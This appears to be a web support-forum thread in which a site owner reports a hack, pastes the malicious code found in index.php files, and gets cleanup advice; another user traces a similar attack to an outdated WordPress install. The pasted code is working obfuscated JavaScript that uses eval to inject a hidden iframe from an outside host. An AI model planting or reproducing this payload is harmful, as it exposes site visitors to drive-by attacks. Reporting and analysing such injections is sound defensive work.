Thread

I was recently hacked using 2.1.4.

Have updated now so hopefully won’t happen again but was keen to see if anyone else had thge same hack, and how it may have happened.

This code appeared at the top of the index.php pages, inside script tags:

if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!64!12!65!65!14!14!7!78!76!58!7!60!60!8!66!71!61!62!81!7!73!65!73!24!76!65!72!80!77!72!73!66!60!22!12!10!13!10!14!17!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!64!12!65!65!14!14!7!78!76!58!7!60!60!8!66!71!61!62!81!7!73!65!73!24!76!65!72!80!77!72!73!66!60!22!12!10!13!10!14!17!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}
if(aa.indexOf(aaa)!==-1)
e(s);

Oh man that sucks. Thanks for the heads up.

Question - are you using /system/ as your main folder name or did you change it? What about “member” or did you change that?

I changed the system folder name.

I didn’t change “member”. The site only has one (super-admin) member which is me.

Most hacks are as a result of insecure hosting - where is your site located?

It’s on 1and1 - not my choice, the clients.

Have let them know about the issue and waiting to see what they say

redfred, I hate to see you experiencing this, but thank you for reporting it. I want you to know that we take security very seriously and will do our best to work with you on figuring out what’s going on. We need to know what other scripts on your account, whether in use or not (phpBB, etc…).

Also, you’ve already noted that you’re working with the host to determine where the attack came from. This is good since they’ll likely be the best source of information regarding whether the attack came through scripts on another account on the server (a common source with these types of hacks).

Please check through these files:

* index.php
* admin.php
* system/index.php
* system/expressionengine/config/config.php

to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

You may also wish to refresh your files by following the update instructions.

The site uses some Javascript but it’s fairly standard. Do you need any further info?

It was the two index.php files you mention that both had the same code added to them, didnm’t seem to be any other files affected. All seems ok since the update.

Hello redfred,

I am glad to hear that everything seems okay since the update.

Do you need anything else? We are here if you have any questions or concerns.

Cheers,

I would be keen to hear if anybody else had similar issues and if they had found out how it happened.

The web hosting people haven’t said much.

Thanks

For what it’s worth, our site was hacked this past weekend too.  some malicious scripts (javascript & php) were inserted into all of our index.php/html, main.php/html, and default.php/html pages.  We removed all of the offending code, only to have it come back a few hours later.

We ultimately found the hack came through an outdated version of Wordpress (2.8.4) installed on our server.  We believe it was an RFI Injection (http://en.wikipedia.org/wiki/Remote_file_inclusion) that came through the comments form.

I suggest checking other index.php files just to see if they have also been affected, and to make sure all other software on your server is up-to-date!

Hello Jon,

Thank you for sharing that information.

Is that helpful redfred?

Hopefully you can get back in contact with your hosting provider.

Regards,

Interesting, as the site had been previously built with WP and I hadn’t got round to removing all the old files yet.

A lesson learnt!

Thanks

Hello redfred,

Wow, that is pretty amazing that WP was involved in both cases. So the million dollar question. Are those files gone now? 😊

Cheers,

Yes, that’s one of the first things I did

Just to confirm that everyone is fine now - no more problems with the hack? Is there anything else I can assist you with?

Sean